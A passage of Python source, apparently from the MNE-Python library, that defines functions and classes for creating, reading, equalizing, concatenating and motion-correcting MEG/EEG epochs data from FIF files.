object, you would use `mne.io.RawArray` first and then create an
`mne.Epochs` object.
"""
@verbose
def __init__(self, data, info, events=None, tmin=0, event_id=None,
reject=None, flat=None, reject_tmin=None,
reject_tmax=None, baseline=None, proj=True,
on_missing='raise', metadata=None, selection=None,
verbose=None): # noqa: D102
dtype = np.complex128 if np.any(np.iscomplex(data)) else np.float64
data = np.asanyarray(data, dtype=dtype)
if data.ndim != 3:
raise ValueError('Data must be a 3D array of shape (n_epochs, '
'n_channels, n_samples)')
if len(info['ch_names']) != data.shape[1]:
raise ValueError('Info and data must have same number of '
'channels.')
if events is None:
n_epochs = len(data)
events = _gen_events(n_epochs)
info = info.copy() # do not modify original info
tmax = (data.shape[2] - 1) / info['sfreq'] + tmin
super(EpochsArray, self).__init__(
info, data, events, event_id, tmin, tmax, baseline,
reject=reject, flat=flat, reject_tmin=reject_tmin,
reject_tmax=reject_tmax, decim=1, metadata=metadata,
selection=selection, proj=proj, on_missing=on_missing,
verbose=verbose)
if self.baseline is not None:
self._do_baseline = True
if len(events) != np.in1d(self.events[:, 2],
list(self.event_id.values())).sum():
raise ValueError('The events must only contain event numbers from '
'event_id')
detrend_picks = self._detrend_picks
for e in self._data:
# This is safe without assignment b/c there is no decim
self._detrend_offset_decim(e, detrend_picks)
self.drop_bad()
def combine_event_ids(epochs, old_event_ids, new_event_id, copy=True):
"""Collapse event_ids from an epochs instance into a new event_id.
Parameters
----------
epochs : instance of Epochs
The epochs to operate on.
old_event_ids : str, or list
Conditions to collapse together.
new_event_id : dict, or int
A one-element dict (or a single integer) for the new
condition. Note that for safety, this cannot be any
existing id (in epochs.event_id.values()).
copy : bool
Whether to return a new instance or modify in place.
Returns
-------
epochs : instance of Epochs
The modified epochs.
Notes
-----
This For example (if epochs.event_id was ``{'Left': 1, 'Right': 2}``::
combine_event_ids(epochs, ['Left', 'Right'], {'Directional': 12})
would create a 'Directional' entry in epochs.event_id replacing
'Left' and 'Right' (combining their trials).
"""
epochs = epochs.copy() if copy else epochs
old_event_ids = np.asanyarray(old_event_ids)
if isinstance(new_event_id, int):
new_event_id = {str(new_event_id): new_event_id}
else:
if not isinstance(new_event_id, dict):
raise ValueError('new_event_id must be a dict or int')
if not len(list(new_event_id.keys())) == 1:
raise ValueError('new_event_id dict must have one entry')
new_event_num = list(new_event_id.values())[0]
new_event_num = operator.index(new_event_num)
if new_event_num in epochs.event_id.values():
raise ValueError('new_event_id value must not already exist')
# could use .pop() here, but if a latter one doesn't exist, we're
# in trouble, so run them all here and pop() later
old_event_nums = np.array([epochs.event_id[key] for key in old_event_ids])
# find the ones to replace
inds = np.any(epochs.events[:, 2][:, np.newaxis] ==
old_event_nums[np.newaxis, :], axis=1)
# replace the event numbers in the events list
epochs.events[inds, 2] = new_event_num
# delete old entries
for key in old_event_ids:
epochs.event_id.pop(key)
# add the new entry
epochs.event_id.update(new_event_id)
return epochs
def equalize_epoch_counts(epochs_list, method='mintime'):
"""Equalize the number of trials in multiple Epoch instances.
Parameters
----------
epochs_list : list of Epochs instances
The Epochs instances to equalize trial counts for.
method : str
If 'truncate', events will be truncated from the end of each event
list. If 'mintime', timing differences between each event list will be
minimized.
Notes
-----
This tries to make the remaining epochs occurring as close as possible in
time. This method works based on the idea that if there happened to be some
time-varying (like on the scale of minutes) noise characteristics during
a recording, they could be compensated for (to some extent) in the
equalization process. This method thus seeks to reduce any of those effects
by minimizing the differences in the times of the events in the two sets of
epochs. For example, if one had event times [1, 2, 3, 4, 120, 121] and the
other one had [3.5, 4.5, 120.5, 121.5], it would remove events at times
[1, 2] in the first epochs and not [120, 121].
Examples
--------
>>> equalize_epoch_counts([epochs1, epochs2]) # doctest: +SKIP
"""
if not all(isinstance(e, BaseEpochs) for e in epochs_list):
raise ValueError('All inputs must be Epochs instances')
# make sure bad epochs are dropped
for e in epochs_list:
if not e._bad_dropped:
e.drop_bad()
event_times = [e.events[:, 0] for e in epochs_list]
indices = _get_drop_indices(event_times, method)
for e, inds in zip(epochs_list, indices):
e.drop(inds, reason='EQUALIZED_COUNT')
def _get_drop_indices(event_times, method):
"""Get indices to drop from multiple event timing lists."""
small_idx = np.argmin([e.shape[0] for e in event_times])
small_e_times = event_times[small_idx]
_check_option('method', method, ['mintime', 'truncate'])
indices = list()
for e in event_times:
if method == 'mintime':
mask = _minimize_time_diff(small_e_times, e)
else:
mask = np.ones(e.shape[0], dtype=bool)
mask[small_e_times.shape[0]:] = False
indices.append(np.where(np.logical_not(mask))[0])
return indices
def _minimize_time_diff(t_shorter, t_longer):
"""Find a boolean mask to minimize timing differences."""
from scipy.interpolate import interp1d
keep = np.ones((len(t_longer)), dtype=bool)
# special case: length zero or one
if len(t_shorter) < 2: # interp1d won't work
keep.fill(False)
if len(t_shorter) == 1:
idx = np.argmin(np.abs(t_longer - t_shorter))
keep[idx] = True
return keep
scores = np.ones((len(t_longer)))
x1 = np.arange(len(t_shorter))
# The first set of keep masks to test
kwargs = dict(copy=False, bounds_error=False, assume_sorted=True)
shorter_interp = interp1d(x1, t_shorter, fill_value=t_shorter[-1],
**kwargs)
for ii in range(len(t_longer) - len(t_shorter)):
scores.fill(np.inf)
# set up the keep masks to test, eliminating any rows that are already
# gone
keep_mask = ~np.eye(len(t_longer), dtype=bool)[keep]
keep_mask[:, ~keep] = False
# Check every possible removal to see if it minimizes
x2 = np.arange(len(t_longer) - ii - 1)
t_keeps = np.array([t_longer[km] for km in keep_mask])
longer_interp = interp1d(x2, t_keeps, axis=1,
fill_value=t_keeps[:, -1],
**kwargs)
d1 = longer_interp(x1) - t_shorter
d2 = shorter_interp(x2) - t_keeps
scores[keep] = np.abs(d1, d1).sum(axis=1) + np.abs(d2, d2).sum(axis=1)
keep[np.argmin(scores)] = False
return keep
@verbose
def _is_good(e, ch_names, channel_type_idx, reject, flat, full_report=False,
ignore_chs=[], verbose=None):
"""Test if data segment e is good according to reject and flat.
If full_report=True, it will give True/False as well as a list of all
offending channels.
"""
bad_tuple = tuple()
has_printed = False
checkable = np.ones(len(ch_names), dtype=bool)
checkable[np.array([c in ignore_chs
for c in ch_names], dtype=bool)] = False
for refl, f, t in zip([reject, flat], [np.greater, np.less], ['', 'flat']):
if refl is not None:
for key, thresh in refl.items():
idx = channel_type_idx[key]
name = key.upper()
if len(idx) > 0:
e_idx = e[idx]
deltas = np.max(e_idx, axis=1) - np.min(e_idx, axis=1)
checkable_idx = checkable[idx]
idx_deltas = np.where(np.logical_and(f(deltas, thresh),
checkable_idx))[0]
if len(idx_deltas) > 0:
bad_names = [ch_names[idx[i]] for i in idx_deltas]
if (not has_printed):
logger.info(' Rejecting %s epoch based on %s : '
'%s' % (t, name, bad_names))
has_printed = True
if not full_report:
return False
else:
bad_tuple += tuple(bad_names)
if not full_report:
return True
else:
if bad_tuple == ():
return True, None
else:
return False, bad_tuple
def _read_one_epoch_file(f, tree, preload):
"""Read a single FIF file."""
with f as fid:
# Read the measurement info
info, meas = read_meas_info(fid, tree, clean_bads=True)
# read in the Annotations if they exist
annotations = _read_annotations_fif(fid, tree)
events, mappings = _read_events_fif(fid, tree)
# Metadata
metadata = None
metadata_tree = dir_tree_find(tree, FIFF.FIFFB_MNE_METADATA)
if len(metadata_tree) > 0:
for dd in metadata_tree[0]['directory']:
kind = dd.kind
pos = dd.pos
if kind == FIFF.FIFF_DESCRIPTION:
metadata = read_tag(fid, pos).data
metadata = _prepare_read_metadata(metadata)
break
# Locate the data of interest
processed = dir_tree_find(meas, FIFF.FIFFB_PROCESSED_DATA)
del meas
if len(processed) == 0:
raise ValueError('Could not find processed data')
epochs_node = dir_tree_find(tree, FIFF.FIFFB_MNE_EPOCHS)
if len(epochs_node) == 0:
# before version 0.11 we errantly saved with this tag instead of
# an MNE tag
epochs_node = dir_tree_find(tree, FIFF.FIFFB_MNE_EPOCHS)
if len(epochs_node) == 0:
epochs_node = dir_tree_find(tree, 122) # 122 used before v0.11
if len(epochs_node) == 0:
raise ValueError('Could not find epochs data')
my_epochs = epochs_node[0]
# Now find the data in the block
data = None
data_tag = None
bmin, bmax = None, None
baseline = None
selection = None
drop_log = None
raw_sfreq = None
reject_params = {}
for k in range(my_epochs['nent']):
kind = my_epochs['directory'][k].kind
pos = my_epochs['directory'][k].pos
if kind == FIFF.FIFF_FIRST_SAMPLE:
tag = read_tag(fid, pos)
first = int(tag.data)
elif kind == FIFF.FIFF_LAST_SAMPLE:
tag = read_tag(fid, pos)
last = int(tag.data)
elif kind == FIFF.FIFF_EPOCH:
# delay reading until later
fid.seek(pos, 0)
data_tag = read_tag_info(fid)
data_tag.pos = pos
data_tag.type = data_tag.type ^ (1 << 30)
elif kind in [FIFF.FIFF_MNE_BASELINE_MIN, 304]:
# Constant 304 was used before v0.11
tag = read_tag(fid, pos)
bmin = float(tag.data)
elif kind in [FIFF.FIFF_MNE_BASELINE_MAX, 305]:
# Constant 305 was used before v0.11
tag = read_tag(fid, pos)
bmax = float(tag.data)
elif kind == FIFF.FIFF_MNE_EPOCHS_SELECTION:
tag = read_tag(fid, pos)
selection = np.array(tag.data)
elif kind == FIFF.FIFF_MNE_EPOCHS_DROP_LOG:
tag = read_tag(fid, pos)
drop_log = tag.data
drop_log = json.loads(drop_log)
drop_log = tuple(tuple(x) for x in drop_log)
elif kind == FIFF.FIFF_MNE_EPOCHS_REJECT_FLAT:
tag = read_tag(fid, pos)
reject_params = json.loads(tag.data)
elif kind == FIFF.FIFF_MNE_EPOCHS_RAW_SFREQ:
tag = read_tag(fid, pos)
raw_sfreq = tag.data
if bmin is not None or bmax is not None:
baseline = (bmin, bmax)
n_samp = last - first + 1
logger.info(' Found the data of interest:')
logger.info(' t = %10.2f ... %10.2f ms'
% (1000 * first / info['sfreq'],
1000 * last / info['sfreq']))
if info['comps'] is not None:
logger.info(' %d CTF compensation matrices available'
% len(info['comps']))
# Inspect the data
if data_tag is None:
raise ValueError('Epochs data not found')
epoch_shape = (len(info['ch_names']), n_samp)
size_expected = len(events) * np.prod(epoch_shape)
# on read double-precision is always used
if data_tag.type == FIFF.FIFFT_FLOAT:
datatype = np.float64
fmt = '>f4'
elif data_tag.type == FIFF.FIFFT_DOUBLE:
datatype = np.float64
fmt = '>f8'
elif data_tag.type == FIFF.FIFFT_COMPLEX_FLOAT:
datatype = np.complex128
fmt = '>c8'
elif data_tag.type == FIFF.FIFFT_COMPLEX_DOUBLE:
datatype = np.complex128
fmt = '>c16'
fmt_itemsize = np.dtype(fmt).itemsize
assert fmt_itemsize in (4, 8, 16)
size_actual = data_tag.size // fmt_itemsize - 16 // fmt_itemsize
if not size_actual == size_expected:
raise ValueError('Incorrect number of samples (%d instead of %d)'
% (size_actual, size_expected))
# Calibration factors
cals = np.array([[info['chs'][k]['cal'] *
info['chs'][k].get('scale', 1.0)]
for k in range(info['nchan'])], np.float64)
# Read the data
if preload:
data = read_tag(fid, data_tag.pos).data.astype(datatype)
data *= cals
# Put it all together
tmin = first / info['sfreq']
tmax = last / info['sfreq']
event_id = ({str(e): e for e in np.unique(events[:, 2])}
if mappings is None else mappings)
# In case epochs didn't have a FIFF.FIFF_MNE_EPOCHS_SELECTION tag
# (version < 0.8):
if selection is None:
selection = np.arange(len(events))
if drop_log is None:
drop_log = ((),) * len(events)
return (info, data, data_tag, events, event_id, metadata, tmin, tmax,
baseline, selection, drop_log, epoch_shape, cals, reject_params,
fmt, annotations, raw_sfreq)
@verbose
def read_epochs(fname, proj=True, preload=True, verbose=None):
"""Read epochs from a fif file.
Parameters
----------
%(epochs_fname)s
%(proj_epochs)s
preload : bool
If True, read all epochs from disk immediately. If ``False``, epochs
will be read on demand.
%(verbose)s
Returns
-------
epochs : instance of Epochs
The epochs.
"""
return EpochsFIF(fname, proj, preload, verbose)
class _RawContainer(object):
"""Helper for a raw data container."""
def __init__(self, fid, data_tag, event_samps, epoch_shape,
cals, fmt): # noqa: D102
self.fid = fid
self.data_tag = data_tag
self.event_samps = event_samps
self.epoch_shape = epoch_shape
self.cals = cals
self.proj = False
self.fmt = fmt
def __del__(self): # noqa: D105
self.fid.close()
@fill_doc
class EpochsFIF(BaseEpochs):
"""Epochs read from disk.
Parameters
----------
%(epochs_fname)s
%(proj_epochs)s
preload : bool
If True, read all epochs from disk immediately. If False, epochs will
be read on demand.
%(verbose)s
See Also
--------
mne.Epochs
mne.epochs.combine_event_ids
mne.Epochs.equalize_event_counts
"""
@verbose
def __init__(self, fname, proj=True, preload=True,
verbose=None): # noqa: D102
if _path_like(fname):
check_fname(
fname=fname, filetype='epochs',
endings=('-epo.fif', '-epo.fif.gz', '_epo.fif', '_epo.fif.gz')
)
fname = _check_fname(fname=fname, must_exist=True,
overwrite='read')
elif not preload:
raise ValueError('preload must be used with file-like objects')
fnames = [fname]
ep_list = list()
raw = list()
for fname in fnames:
fname_rep = _get_fname_rep(fname)
logger.info('Reading %s ...' % fname_rep)
fid, tree, _ = fiff_open(fname, preload=preload)
next_fname = _get_next_fname(fid, fname, tree)
(info, data, data_tag, events, event_id, metadata, tmin, tmax,
baseline, selection, drop_log, epoch_shape, cals,
reject_params, fmt, annotations, raw_sfreq) = \
_read_one_epoch_file(fid, tree, preload)
if (events[:, 0] < 0).any():
events = events.copy()
warn('Incorrect events detected on disk, setting event '
'numbers to consecutive increasing integers')
events[:, 0] = np.arange(1, len(events) + 1)
# here we ignore missing events, since users should already be
# aware of missing events if they have saved data that way
# we also retain original baseline without re-applying baseline
# correction (data is being baseline-corrected when written to
# disk)
epoch = BaseEpochs(
info, data, events, event_id, tmin, tmax,
baseline=None,
metadata=metadata, on_missing='ignore',
selection=selection, drop_log=drop_log,
proj=False, verbose=False, raw_sfreq=raw_sfreq)
epoch.baseline = baseline
epoch._do_baseline = False # might be superfluous but won't hurt
ep_list.append(epoch)
if not preload:
# store everything we need to index back to the original data
raw.append(_RawContainer(fiff_open(fname)[0], data_tag,
events[:, 0].copy(), epoch_shape,
cals, fmt))
if next_fname is not None:
fnames.append(next_fname)
unsafe_annot_add = raw_sfreq is None
(info, data, raw_sfreq, events, event_id, tmin, tmax, metadata,
baseline, selection, drop_log) = \
_concatenate_epochs(ep_list, with_data=preload, add_offset=False)
# we need this uniqueness for non-preloaded data to work properly
if len(np.unique(events[:, 0])) != len(events):
raise RuntimeError('Event time samples were not unique')
# correct the drop log
assert len(drop_log) % len(fnames) == 0
step = len(drop_log) // len(fnames)
offsets = np.arange(step, len(drop_log) + 1, step)
drop_log = list(drop_log)
for i1, i2 in zip(offsets[:-1], offsets[1:]):
other_log = drop_log[i1:i2]
for k, (a, b) in enumerate(zip(drop_log, other_log)):
if a == ('IGNORED',) and b != ('IGNORED',):
drop_log[k] = b
drop_log = tuple(drop_log[:step])
# call BaseEpochs constructor
# again, ensure we're retaining the baseline period originally loaded
# from disk without trying to re-apply baseline correction
super(EpochsFIF, self).__init__(
info, data, events, event_id, tmin, tmax,
baseline=None, raw=raw,
proj=proj, preload_at_end=False, on_missing='ignore',
selection=selection, drop_log=drop_log, filename=fname_rep,
metadata=metadata, verbose=verbose, raw_sfreq=raw_sfreq,
annotations=annotations, **reject_params)
self.baseline = baseline
self._do_baseline = False
# use the private property instead of drop_bad so that epochs
# are not all read from disk for preload=False
self._bad_dropped = True
# private property to suggest that people re-save epochs if they add
# annotations
self._unsafe_annot_add = unsafe_annot_add
@verbose
def _get_epoch_from_raw(self, idx, verbose=None):
"""Load one epoch from disk."""
# Find the right file and offset to use
event_samp = self.events[idx, 0]
for raw in self._raw:
idx = np.where(raw.event_samps == event_samp)[0]
if len(idx) == 1:
fmt = raw.fmt
idx = idx[0]
size = np.prod(raw.epoch_shape) * np.dtype(fmt).itemsize
offset = idx * size + 16 # 16 = Tag header
break
else:
# read the correct subset of the data
raise RuntimeError('Correct epoch could not be found, please '
'contact mne-python developers')
# the following is equivalent to this, but faster:
#
# >>> data = read_tag(raw.fid, raw.data_tag.pos).data.astype(float)
# >>> data *= raw.cals[np.newaxis, :, :]
# >>> data = data[idx]
#
# Eventually this could be refactored in io/tag.py if other functions
# could make use of it
raw.fid.seek(raw.data_tag.pos + offset, 0)
if fmt == '>c8':
read_fmt = '>f4'
elif fmt == '>c16':
read_fmt = '>f8'
else:
read_fmt = fmt
data = np.frombuffer(raw.fid.read(size), read_fmt)
if read_fmt != fmt:
data = data.view(fmt)
data = data.astype(np.complex128)
else:
data = data.astype(np.float64)
data.shape = raw.epoch_shape
data *= raw.cals
return data
@fill_doc
def bootstrap(epochs, random_state=None):
"""Compute epochs selected by bootstrapping.
Parameters
----------
epochs : Epochs instance
epochs data to be bootstrapped
%(random_state)s
Returns
-------
epochs : Epochs instance
The bootstrap samples
"""
if not epochs.preload:
raise RuntimeError('Modifying data of epochs is only supported '
'when preloading is used. Use preload=True '
'in the constructor.')
rng = check_random_state(random_state)
epochs_bootstrap = epochs.copy()
n_events = len(epochs_bootstrap.events)
idx = rng_uniform(rng)(0, n_events, n_events)
epochs_bootstrap = epochs_bootstrap[idx]
return epochs_bootstrap
def _check_merge_epochs(epochs_list):
"""Aux function."""
if len({tuple(epochs.event_id.items()) for epochs in epochs_list}) != 1:
raise NotImplementedError("Epochs with unequal values for event_id")
if len({epochs.tmin for epochs in epochs_list}) != 1:
raise NotImplementedError("Epochs with unequal values for tmin")
if len({epochs.tmax for epochs in epochs_list}) != 1:
raise NotImplementedError("Epochs with unequal values for tmax")
if len({epochs.baseline for epochs in epochs_list}) != 1:
raise NotImplementedError("Epochs with unequal values for baseline")
@verbose
def add_channels_epochs(epochs_list, verbose=None):
"""Concatenate channels, info and data from two Epochs objects.
Parameters
----------
epochs_list : list of Epochs
Epochs object to concatenate.
%(verbose)s Defaults to True if any of the input epochs have verbose=True.
Returns
-------
epochs : instance of Epochs
Concatenated epochs.
"""
if not all(e.preload for e in epochs_list):
raise ValueError('All epochs must be preloaded.')
info = _merge_info([epochs.info for epochs in epochs_list])
data = [epochs._data for epochs in epochs_list]
_check_merge_epochs(epochs_list)
for d in data:
if len(d) != len(data[0]):
raise ValueError('all epochs must be of the same length')
data = np.concatenate(data, axis=1)
if len(info['chs']) != data.shape[1]:
err = "Data shape does not match channel number in measurement info"
raise RuntimeError(err)
events = epochs_list[0].events.copy()
all_same = all(np.array_equal(events, epochs.events)
for epochs in epochs_list[1:])
if not all_same:
raise ValueError('Events must be the same.')
proj = any(e.proj for e in epochs_list)
epochs = epochs_list[0].copy()
epochs.info = info
epochs.picks = None
epochs.events = events
epochs.preload = True
epochs._bad_dropped = True
epochs._data = data
epochs._projector, epochs.info = setup_proj(epochs.info, False,
activate=proj)
return epochs
def _concatenate_epochs(epochs_list, with_data=True, add_offset=True, *,
on_mismatch='raise'):
"""Auxiliary function for concatenating epochs."""
if not isinstance(epochs_list, (list, tuple)):
raise TypeError('epochs_list must be a list or tuple, got %s'
% (type(epochs_list),))
# to make warning messages only occur once during concatenation
warned = False
for ei, epochs in enumerate(epochs_list):
if not isinstance(epochs, BaseEpochs):
raise TypeError('epochs_list[%d] must be an instance of Epochs, '
'got %s' % (ei, type(epochs)))
if (getattr(epochs, 'annotations', None) is not None and
len(epochs.annotations) > 0 and
not warned):
warned = True
warn('Concatenation of Annotations within Epochs is not supported '
'yet. All annotations will be dropped.')
# create a copy, so that the Annotations are not modified in place
# from the original object
epochs = epochs.copy()
epochs.set_annotations(None)
out = epochs_list[0]
offsets = [0]
if with_data:
out.drop_bad()
offsets.append(len(out))
events = [out.events]
metadata = [out.metadata]
baseline, tmin, tmax = out.baseline, out.tmin, out.tmax
raw_sfreq = out._raw_sfreq
info = deepcopy(out.info)
drop_log = out.drop_log
event_id = deepcopy(out.event_id)
selection = out.selection
# offset is the last epoch + tmax + 10 second
shift = int((10 + tmax) * out.info['sfreq'])
events_offset = int(np.max(events[0][:, 0])) + shift
events_overflow = False
warned = False
for ii, epochs in enumerate(epochs_list[1:], 1):
_ensure_infos_match(epochs.info, info, f'epochs[{ii}]',
on_mismatch=on_mismatch)
if not np.allclose(epochs.times, epochs_list[0].times):
raise ValueError('Epochs must have same times')
if epochs.baseline != baseline:
raise ValueError('Baseline must be same for all epochs')
if epochs._raw_sfreq != raw_sfreq and not warned:
warned = True
warn('The original raw sampling rate of the Epochs does not '
'match for all Epochs. Please proceed cautiously.')
# compare event_id
common_keys = list(set(event_id).intersection(set(epochs.event_id)))
for key in common_keys:
if not event_id[key] == epochs.event_id[key]:
msg = ('event_id values must be the same for identical keys '
'for all concatenated epochs. Key "{}" maps to {} in '
'some epochs and to {} in others.')
raise ValueError(msg.format(key, event_id[key],
epochs.event_id[key]))
if with_data:
epochs.drop_bad()
offsets.append(len(epochs))
evs = epochs.events.copy()
if len(epochs.events) == 0:
warn('One of the Epochs objects to concatenate was empty.')
elif add_offset:
# We need to cast to a native Python int here to detect an
# overflow of a numpy int32 (which is the default on windows)
max_timestamp = int(np.max(evs[:, 0]))
evs[:, 0] += events_offset
events_offset += max_timestamp + shift
if events_offset > INT32_MAX:
warn(f'Event number greater than {INT32_MAX} created, '
'events[:, 0] will be assigned consecutive increasing '
'integer values')
events_overflow = True
add_offset = False # we no longer need to add offset
events.append(evs)
selection = np.concatenate((selection, epochs.selection))
drop_log = drop_log + epochs.drop_log
event_id.update(epochs.event_id)
metadata.append(epochs.metadata)
events = np.concatenate(events, axis=0)
# check to see if we exceeded our maximum event offset
if events_overflow:
events[:, 0] = np.arange(1, len(events) + 1)
# Create metadata object (or make it None)
n_have = sum(this_meta is not None for this_meta in metadata)
if n_have == 0:
metadata = None
elif n_have != len(metadata):
raise ValueError('%d of %d epochs instances have metadata, either '
'all or none must have metadata'
% (n_have, len(metadata)))
else:
pd = _check_pandas_installed(strict=False)
if pd is not False:
metadata = pd.concat(metadata)
else: # dict of dicts
metadata = sum(metadata, list())
assert len(offsets) == (len(epochs_list) if with_data else 0) + 1
data = None
if with_data:
offsets = np.cumsum(offsets)
for start, stop, epochs in zip(offsets[:-1], offsets[1:], epochs_list):
this_data = epochs.get_data()
if data is None:
data = np.empty(
(offsets[-1], len(out.ch_names), len(out.times)),
dtype=this_data.dtype)
data[start:stop] = this_data
return (info, data, raw_sfreq, events, event_id, tmin, tmax, metadata,
baseline, selection, drop_log)
def _finish_concat(info, data, raw_sfreq, events, event_id, tmin, tmax,
metadata, baseline, selection, drop_log):
"""Finish concatenation for epochs not read from disk."""
selection = np.where([len(d) == 0 for d in drop_log])[0]
out = BaseEpochs(
info, data, events, event_id, tmin, tmax, baseline=baseline,
selection=selection, drop_log=drop_log, proj=False,
on_missing='ignore', metadata=metadata, raw_sfreq=raw_sfreq)
out.drop_bad()
return out
@verbose
def concatenate_epochs(epochs_list, add_offset=True, *, on_mismatch='raise',
verbose=None):
"""Concatenate a list of `~mne.Epochs` into one `~mne.Epochs` object.
.. note:: Unlike `~mne.concatenate_raws`, this function does **not**
modify any of the input data.
Parameters
----------
epochs_list : list
List of `~mne.Epochs` instances to concatenate (in that order).
add_offset : bool
If True, a fixed offset is added to the event times from different
Epochs sets, such that they are easy to distinguish after the
concatenation.
If False, the event times are unaltered during the concatenation.
%(on_info_mismatch)s
%(verbose)s
.. versionadded:: 0.24
Returns
-------
epochs : instance of Epochs
The result of the concatenation.
Notes
-----
.. versionadded:: 0.9.0
"""
return _finish_concat(*_concatenate_epochs(epochs_list,
add_offset=add_offset,
on_mismatch=on_mismatch))
@verbose
def average_movements(epochs, head_pos=None, orig_sfreq=None, picks=None,
origin='auto', weight_all=True, int_order=8, ext_order=3,
destination=None, ignore_ref=False, return_mapping=False,
mag_scale=100., verbose=None):
"""Average data using Maxwell filtering, transforming using head positions.
Parameters
----------
epochs : instance of Epochs
The epochs to operate on.
%(maxwell_pos)s
orig_sfreq : float | None
The original sample frequency of the data (that matches the
event sample numbers in ``epochs.events``). Can be ``None``
if data have not been decimated or resampled.
%(picks_all_data)s
%(maxwell_origin)s
weight_all : bool
If True, all channels are weighted by the SSS basis weights.
If False, only MEG channels are weighted, other channels
receive uniform weight per epoch.
%(maxwell_int)s
%(maxwell_ext)s
%(maxwell_dest)s
%(maxwell_ref)s
return_mapping : bool
If True, return the mapping matrix.
%(maxwell_mag)s
.. versionadded:: 0.13
%(verbose)s
Returns
-------
evoked : instance of Evoked
The averaged epochs.
See Also
--------
mne.preprocessing.maxwell_filter
mne.chpi.read_head_pos
Notes
-----
The Maxwell filtering version of this algorithm is described in [1]_,
in section V.B "Virtual signals and movement correction", equations
40-44. For additional validation, see [2]_.
Regularization has not been added because in testing it appears to
decrease dipole localization accuracy relative to using all components.
Fine calibration and cross-talk cancellation, however, could be added
to this algorithm based on user demand.
.. versionadded:: 0.11
References
----------
.. [1] Taulu S. and Kajola M. "Presentation of electromagnetic
multichannel data: The signal space separation method,"
Journal of Applied Physics, vol. 97, pp. 124905 1-10, 2005.
.. [2] Wehner DT, Hämäläinen MS, Mody M, Ahlfors SP. "Head movements
of children in MEG: Quantification, effects on source
estimation, and compensation. NeuroImage 40:541–550, 2008.
""" # noqa: E501
from .preprocessing.maxwell import (_trans_sss_basis, _reset_meg_bads,
_check_usable, _col_norm_pinv,
_get_n_moments, _get_mf_picks_fix_mags,
_prep_mf_coils, _check_destination,
_remove_meg_projs, _get_coil_scale)
if head_pos is None:
raise TypeError('head_pos must be provided and cannot be None')
from .chpi import head_pos_to_trans_rot_t
if not isinstance(epochs, BaseEpochs):
raise TypeError('epochs must be an instance of Epochs, not %s'
% (type(epochs),))
orig_sfreq = epochs.info['sfreq'] if orig_sfreq is None else orig_sfreq
orig_sfreq = float(orig_sfreq)
if isinstance(head_pos, np.ndarray):
head_pos = head_pos_to_trans_rot_t(head_pos)
trn, rot, t = head_pos
del head_pos
_check_usable(epochs)
origin = _check_origin(origin, epochs.info, 'head')
recon_trans = _check_destination(destination, epochs.info, True)
logger.info('Aligning and averaging up to %s epochs'
% (len(epochs.events)))
if not np.array_equal(epochs.events[:, 0], np.unique(epochs.events[:, 0])):
raise RuntimeError('Epochs must have monotonically increasing events')
info_to = epochs.info.copy()
meg_picks, mag_picks, grad_picks, good_mask, _ = \
_get_mf_picks_fix_mags(info_to, int_order, ext_order, ignore_ref)
coil_scale, mag_scale = _get_coil_scale(
meg_picks, mag_picks, grad_picks, mag_scale, info_to)
n_channels, n_times = len(epochs.ch_names), len(epochs.times)
other_picks = np.setdiff1d(np.arange(n_channels), meg_picks)
data = np.zeros((n_channels, n_times))
count = 0
# keep only MEG w/bad channels marked in "info_from"
info_from = pick_info(info_to, meg_picks[good_mask], copy=True)
all_coils_recon = _prep_mf_coils(info_to, ignore_ref=ignore_ref)
all_coils = _prep_mf_coils(info_from, ignore_ref=ignore_ref)
# remove MEG bads in "to" info
_reset_meg_bads(info_to)
# set up variables
w_sum = 0.
n_in, n_out = _get_n_moments([int_order, ext_order])
S_decomp = 0. # this will end up being a weighted average
last_trans = None
decomp_coil_scale = coil_scale[good_mask]
exp = dict(int_order=int_order, ext_order=ext_order, head_frame=True,
origin=origin)
n_in = _get_n_moments(int_order)
for ei, epoch in enumerate(epochs):
event_time = epochs.events[epochs._current - 1, 0] / orig_sfreq
use_idx = np.where(t <= event_time)[0]
if len(use_idx) == 0:
trans = info_to['dev_head_t']['trans']
else:
use_idx = use_idx[-1]
trans = np.vstack([np.hstack([rot[use_idx], trn[[use_idx]].T]),
[[0., 0., 0., 1.]]])
loc_str = ', '.join('%0.1f' % tr for tr in (trans[:3, 3] * 1000))
if last_trans is None or not np.allclose(last_trans, trans):
logger.info(' Processing epoch %s (device location: %s mm)'
% (ei + 1, loc_str))
reuse = False
last_trans = trans
else:
logger.info(' Processing epoch %s (device location: same)'
% (ei + 1,))
reuse = True
epoch = epoch.copy() # because we operate inplace
if not reuse:
S = _trans_sss_basis(exp, all_coils, trans,
coil_scale=decomp_coil_scale)
# Get the weight from the un-regularized version (eq. 44)
weight = np.linalg.norm(S[:, :n_in])
# XXX Eventually we could do cross-talk and fine-cal here
S *= weight
S_decomp += S # eq. 41
epoch[slice(None) if weight_all else meg_picks] *= weight
data += epoch # eq. 42
w_sum += weight
count += 1
del info_from
mapping = None
if count == 0:
data.fill(np.nan)
else:
data[meg_picks] /= w_sum
data[other_picks] /= w_sum if weight_all else count
# Finalize weighted average decomp matrix
S_decomp /= w_sum
# Get recon matrix
# (We would need to include external here for regularization to work)
exp['ext_order'] = 0
S_recon = _trans_sss_basis(exp, all_coils_recon, recon_trans)
exp['ext_order'] = ext_order
# We could determine regularization on basis of destination basis
# matrix, restricted to good channels, as regularizing individual
# matrices within the loop above does not seem to work. But in
# testing this seemed to decrease localization quality in most cases,
# so we do not provide the option here.
S_recon /= coil_scale
# Invert
pS_ave = _col_norm_pinv(S_decomp)[0][:n_in]
pS_ave *= decomp_coil_scale.T
# Get mapping matrix
mapping = np.dot(S_recon, pS_ave)
# Apply mapping
data[meg_picks] = np.dot(mapping, data[meg_picks[good_mask]])
info_to['dev_head_t'] = recon_trans # set the reconstruction transform
evoked = epochs._evoked_from_epoch_data(data, info_to, picks,
n_events=count, kind='average',
comment=epochs._name)
_remove_meg_projs(evoked) # remove MEG projectors, they won't apply now
logger.info('Created Evoked dataset from %s epochs' % (count,))
return (evoked, mapping) if return_mapping else evoked
@verbose
def make_fixed_length_epochs(raw, duration=1., preload=False,
reject_by_annotation=True, proj=True, overlap=0.,
id=1, verbose=None):
"""Divide continuous raw data into equal-sized consecutive epochs.
Parameters
----------
raw : instance of Raw
Raw data to divide into segments.
duration : float
Duration of each epoch in seconds. Defaults to 1.
%(preload)s
%(reject_by_annotation_epochs)s
.. versionadded:: 0.21.0
%(proj_epochs)s
.. versionadded:: 0.22.0
overlap : float
The overlap between epochs, in seconds. Must be
``0 <= overlap < duration``. Default is 0, i.e., no overlap.
.. versionadded:: 0.23.0
id : int
The id to use (default 1).
